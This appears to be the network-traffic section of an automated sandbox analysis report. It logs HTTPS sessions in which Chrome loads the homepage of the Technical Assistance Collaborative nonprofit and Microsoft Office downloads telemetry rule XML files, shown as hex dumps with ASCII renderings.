                                                                                                                                                                                                                              2024-10-23 18:03:59 UTC16384INData Raw: 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                              Data Ascii: R> </O> </F> <F T="6"> <O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L>
                                                                                                                                                                                                                              2024-10-23 18:03:59 UTC16384INData Raw: 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                                                                                                                                                                                                              Data Ascii: T="6"> <O T="EQ"> <L> <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              2192.168.2.649721141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:03:59 UTC657OUTGET / HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                              Sec-Fetch-User: ?1
                                                                                                                                                                                                                              Sec-Fetch-Dest: document
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              2024-10-23 18:04:00 UTC978INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:00 GMT
                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding,Cookie
                                                                                                                                                                                                                              X-Frame-Options: sameorigin
                                                                                                                                                                                                                              X-XSS-Protection: 1
                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                              Strict-Transport-Security: max-age=2592000
                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                              Permissions-Policy: accelerometer=(self), autoplay=(self), camera=(self), encrypted-media=(self), fullscreen=(self), geolocation=(self), gyroscope=(self), magnetometer=(self), microphone=(self), midi=(self), payment=(self), usb=(self)
                                                                                                                                                                                                                              Last-Modified: Sun, 21 Jan 2024 15:39:36 GMT
                                                                                                                                                                                                                              Link: <https://www.tacinc.org/>; rel=shortlink
                                                                                                                                                                                                                              X-Powered-By: WP user
                                                                                                                                                                                                                              X-Cacheable: SHORT
                                                                                                                                                                                                                              Cache-Control: max-age=600, must-revalidate
                                                                                                                                                                                                                              X-Cache: HIT: 9
                                                                                                                                                                                                                              X-Cache-Group: normal
                                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5a3889a6b3b-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:00 UTC391INData Raw: 37 62 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 21 2d 2d 2f 2f 20 4f 50 45 4e 20 48 54 4d 4c 20 2f 2f 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 3e 0a 0a 3c 21 2d 2d 2f 2f 20 4f 50 45 4e 20 48 45 41 44 20 2f 2f 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 20 20 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 61 63 69 6e 63 2e 6f 72 67 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 73 6f 63 69 61 6c 64 72 69 76 65 72 2f 63 73 73 2f 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 77 6f 66 66 32 3f 76 3d 34 2e 33 2e 30 22 20 61 73 3d 22 66 6f 6e 74 22 20 74 79 70 65 3d 22 66 6f 6e 74 2f 77 6f 66 66 32 22
                                                                                                                                                                                                                              Data Ascii: 7bde<!DOCTYPE html>...// OPEN HTML //--><html lang="en-US" >...// OPEN HEAD //--><head> <link rel="preload" href="https://www.tacinc.org/wp-content/themes/socialdriver/css/fonts/fontawesome-webfont.woff2?v=4.3.0" as="font" type="font/woff2"
                                                                                                                                                                                                                              2024-10-23 18:04:00 UTC1369INData Raw: 22 66 6f 6e 74 2f 77 6f 66 66 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 54 65 63 68 6e 69 63 61 6c 20 41 73 73 69 73 74 61 6e 63 65 20 43 6f 6c 6c 61 62 6f 72 61 74 69 76 65 20 2d 20 54 41 43 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 09 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62
                                                                                                                                                                                                                              Data Ascii: "font/woff" crossorigin> <title>The Technical Assistance Collaborative - TAC</title> <meta charset="UTF-8"/> <meta name="viewport" content="width=device-width, initial-scale=1"/> <meta name="apple-mobile-web
                                                                                                                                                                                                                              2024-10-23 18:04:00 UTC1369INData Raw: 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 65 20 54 65 63 68 6e 69 63 61 6c 20 41 73 73 69 73 74 61 6e 63 65 20 43 6f 6c 6c 61 62 6f 72 61 74 69 76 65 20 69 73 20 61 20 6e 6f 6e 70 72 6f 66 69 74 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 20 64 65 64 69 63 61 74 65 64 20 74 6f 20 68 65 6c 70 69 6e 67 20 6f 75 72 20 6e 61 74 69 6f 6e e2 80 99 73 20 68 75 6d 61 6e 20 73 65 72 76 69 63 65 73 2c 20 68 65 61 6c 74 68 20 63 61 72 65 2c 20 68 6f 6d 65 6c 65 73 73 6e 65 73 73 2c 20 61 6e 64 20 61 66 66 6f 72 64 61 62 6c 65 20 68 6f 75 73 69 6e 67 20 73 79 73 74 65 6d 73 20 69 6d 70 6c 65 6d 65 6e 74 20 70 6f 6c 69 63 69 65 73 20 61 6e 64 20 70 72 61 63 74 69 63 65 73 20 74 68 61 74 20 65 6d 70 6f 77 65 72 20 70 65 6f 70 6c 65 20 74 6f
                                                                                                                                                                                                                              Data Ascii: "description" content="The Technical Assistance Collaborative is a nonprofit organization dedicated to helping our nations human services, health care, homelessness, and affordable housing systems implement policies and practices that empower people to
                                                                                                                                                                                                                              2024-10-23 18:04:00 UTC1369INData Raw: 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 36 30 31 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 63 61 72 64 22 20 63 6f 6e 74 65 6e 74 3d 22 73 75 6d 6d 61 72 79 5f 6c 61 72 67 65 5f 69 6d 61 67 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 40 54 41 43 49 6e 63 42 6f 73 74 6f 6e 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e
                                                                                                                                                                                                                              Data Ascii: ight" content="601" /><meta property="og:image:type" content="image/png" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:site" content="@TACIncBoston" /><script type="application/ld+json" class="yoast-schema-graph">
                                                                                                                                                                                                                              2024-10-23 18:04:00 UTC1369INData Raw: 69 6e 63 2e 6f 72 67 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 30 2f 31 32 2f 73 6f 63 69 61 6c 2d 66 61 6c 6c 62 61 63 6b 2e 70 6e 67 22 2c 22 63 6f 6e 74 65 6e 74 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 61 63 69 6e 63 2e 6f 72 67 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 30 2f 31 32 2f 73 6f 63 69 61 6c 2d 66 61 6c 6c 62 61 63 6b 2e 70 6e 67 22 2c 22 77 69 64 74 68 22 3a 31 32 30 30 2c 22 68 65 69 67 68 74 22 3a 36 30 31 7d 2c 7b 22 40 74 79 70 65 22 3a 22 42 72 65 61 64 63 72 75 6d 62 4c 69 73 74 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 61 63 69 6e 63 2e 6f 72 67 2f 23 62 72 65 61 64 63 72 75 6d 62 22 2c 22 69 74 65 6d 4c 69 73 74 45 6c 65 6d 65 6e 74 22 3a
                                                                                                                                                                                                                              Data Ascii: inc.org/wp-content/uploads/2020/12/social-fallback.png","contentUrl":"https://www.tacinc.org/wp-content/uploads/2020/12/social-fallback.png","width":1200,"height":601},{"@type":"BreadcrumbList","@id":"https://www.tacinc.org/#breadcrumb","itemListElement":
                                                                                                                                                                                                                              2024-10-23 18:04:00 UTC1369INData Raw: 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 2d 61 75 74 68 6f 72 73 2d 70 6c 75 73 2d 61 76 61 74 61 72 20 3a 77 68 65 72 65 28 69 6d 67 29 7b 68 65 69 67 68 74 3a 61 75 74 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 6f 74 74 6f 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 2d 61 75 74 68 6f 72 73 2d 70 6c 75 73 2d 63 6f 61 75 74 68 6f 72 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 6f 77 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 2d 61 75 74 68 6f 72 73 2d 70 6c 75 73 2d 61 76 61 74 61 72 20 3a 77 68 65 72 65 28 69 6d 67 29 7b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 2d 61 75 74 68 6f 72 73 2d 70 6c 75 73 2d 61 76 61
                                                                                                                                                                                                                              Data Ascii: -inline-css'>.wp-block-co-authors-plus-avatar :where(img){height:auto;max-width:100%;vertical-align:bottom}.wp-block-co-authors-plus-coauthors.is-layout-flow .wp-block-co-authors-plus-avatar :where(img){vertical-align:middle}.wp-block-co-authors-plus-ava
                                                                                                                                                                                                                              2024-10-23 18:04:00 UTC1369INData Raw: 74 70 61 63 6b 2d 73 68 61 72 69 6e 67 2d 62 75 74 74 6f 6e 73 5f 5f 73 65 72 76 69 63 65 73 2d 6c 69 73 74 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 7d 2e 6a 65 74 70 61 63 6b 2d 73 68 61 72 69 6e 67 2d 62 75 74 74 6f 6e 73 5f 5f 73 65 72 76 69 63 65 73 2d 6c 69 73 74 2e 68 61 73 2d 6e 6f 72 6d 61 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 6a 65 74 70 61 63 6b 2d 73 68 61 72 69 6e 67 2d 62 75 74 74 6f 6e 73 5f 5f 73 65 72 76 69 63 65 73 2d 6c 69 73 74 2e 68 61 73 2d 6c 61 72 67 65 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 7d 2e 6a 65 74 70 61 63 6b 2d 73 68 61 72 69 6e 67 2d 62 75 74 74 6f 6e 73 5f 5f 73 65 72 76 69 63
                                                                                                                                                                                                                              Data Ascii: tpack-sharing-buttons__services-list.has-small-icon-size{font-size:12px}.jetpack-sharing-buttons__services-list.has-normal-icon-size{font-size:16px}.jetpack-sharing-buttons__services-list.has-large-icon-size{font-size:24px}.jetpack-sharing-buttons__servic
                                                                                                                                                                                                                              2024-10-23 18:04:00 UTC1369INData Raw: 61 6d 69 6c 79 3d 53 6f 75 72 63 65 2b 53 61 6e 73 2b 50 72 6f 25 33 41 34 30 30 26 23 30 33 38 3b 64 69 73 70 6c 61 79 3d 62 6c 6f 63 6b 26 23 30 33 38 3b 76 65 72 3d 31 36 38 36 32 33 39 39 32 37 27 20 6d 65 64 69 61 3d 27 70 72 69 6e 74 27 20 6f 6e 6c 6f 61 64 3d 27 74 68 69 73 2e 6d 65 64 69 61 3d 26 23 33 34 3b 61 6c 6c 26 23 33 34 3b 27 20 2f 3e 0a 3c 73 63 72 69 70 74 20 69 64 3d 22 77 70 68 62 2d 33 2d 6a 73 2d 65 78 74 72 61 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 76 61 72 20 70 70 20 3d 20 7b 22 61 6a 61 78 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 74 61 63 69 6e 63 2e 6f 72 67 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f 61 64 6d 69 6e 2d 61 6a 61 78 2e 70 68 70 22 7d 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63
                                                                                                                                                                                                                              Data Ascii: amily=Source+Sans+Pro%3A400&#038;display=block&#038;ver=1686239927' media='print' onload='this.media=&#34;all&#34;' /><script id="wphb-3-js-extra">/* <![CDATA[ */var pp = {"ajax_url":"https:\/\/www.tacinc.org\/wp-admin\/admin-ajax.php"};/* ... */</sc
                                                                                                                                                                                                                              2024-10-23 18:04:00 UTC1369INData Raw: 7a 79 6c 6f 61 64 69 6e 67 20 7b 0d 0a 09 09 09 09 6d 69 6e 2d 77 69 64 74 68 3a 20 31 35 30 70 78 3b 0d 0a 09 09 09 7d 0d 0a 0d 0a 09 09 09 09 09 09 2e 6c 61 7a 79 6c 6f 61 64 2c 20 2e 6c 61 7a 79 6c 6f 61 64 69 6e 67 20 7b 0d 0a 09 09 09 09 6f 70 61 63 69 74 79 3a 20 30 3b 0d 0a 09 09 09 7d 0d 0a 0d 0a 09 09 09 2e 6c 61 7a 79 6c 6f 61 64 65 64 20 7b 0d 0a 09 09 09 09 6f 70 61 63 69 74 79 3a 20 31 3b 0d 0a 09 09 09 09 74 72 61 6e 73 69 74 69 6f 6e 3a 20 6f 70 61 63 69 74 79 20 34 30 30 6d 73 3b 0d 0a 09 09 09 09 74 72 61 6e 73 69 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 30 6d 73 3b 0d 0a 09 09 09 7d 0d 0a 0d 0a 09 09 09 09 09 3c 2f 73 74 79 6c 65 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45
                                                                                                                                                                                                                              Data Ascii: zyloading {min-width: 150px;}.lazyload, .lazyloading {opacity: 0;}.lazyloaded {opacity: 1;transition: opacity 400ms;transition-delay: 0ms;}</style><meta name="generator" content="E
                                                                                                                                                                                                                              2024-10-23 18:04:00 UTC1369INData Raw: 75 65 65 73 20 65 6c 65 6d 65 6e 74 73 20 0d 0a 61 63 72 6f 73 73 20 73 69 74 65 20 74 68 61 74 20 6f 6e 6c 79 20 68 61 76 65 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 20 70 72 6f 70 65 72 74 69 65 73 20 2a 2f 0d 0a 2e 68 6f 72 69 7a 6f 6e 74 61 6c 2d 63 74 61 2d 77 72 61 70 70 65 72 2c 0d 0a 2e 63 74 61 2d 63 6f 6c 2c 0d 0a 2e 62 67 2d 62 6c 75 65 2d 68 65 72 6f 2c 20 0d 0a 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 65 63 74 69 6f 6e 2e 6d 69 73 73 69 6f 6e 2d 73 74 61 74 65 6d 65 6e 74 2d 77 72 61 70 70 65 72 2c 20 0d 0a 2e 62 6c 6f 67 2d 66 65 65 64 2d 70 61 67 65 2d 68 65 61 64 69 6e 67 2c 20 0d 0a 2f 2a 20 61 6e 64 20 69 6e 64 69 76 69 64 75 61 6c 20 62 6c 6f 67 20 65 6e 74 72 79 20 68 65 61 64 69 6e 67 73 2e 20 43 61 6e 20 74 68 69 73 20 62 65 20
                                                                                                                                                                                                                              Data Ascii: uees elements across site that only have background-image properties */.horizontal-cta-wrapper,.cta-col,.bg-blue-hero, .elementor-section.mission-statement-wrapper, .blog-feed-page-heading, /* and individual blog entry headings. Can this be


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              3192.168.2.64972513.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:00 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:00 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 408
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                                                                                              x-ms-request-id: 31a53d7e-801e-00a3-74f7-217cfb000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180400Z-17fbfdc98bbgzrcvp7acfz2d3000000006a00000000001dt
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:00 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              4192.168.2.64972313.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:00 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:00 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 450
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                                                                              x-ms-request-id: 77f74883-b01e-0001-1a50-2346e2000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180400Z-17fbfdc98bbnmnfvzuhft9x8zg00000004sg00000000a94h
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:00 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              5192.168.2.64972613.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:00 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:00 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:00 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 2160
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                                                                              x-ms-request-id: 3b262095-501e-0035-475d-23c923000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180400Z-r1755647c66ldfgxa3qp9d53us00000008ng0000000049r5
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
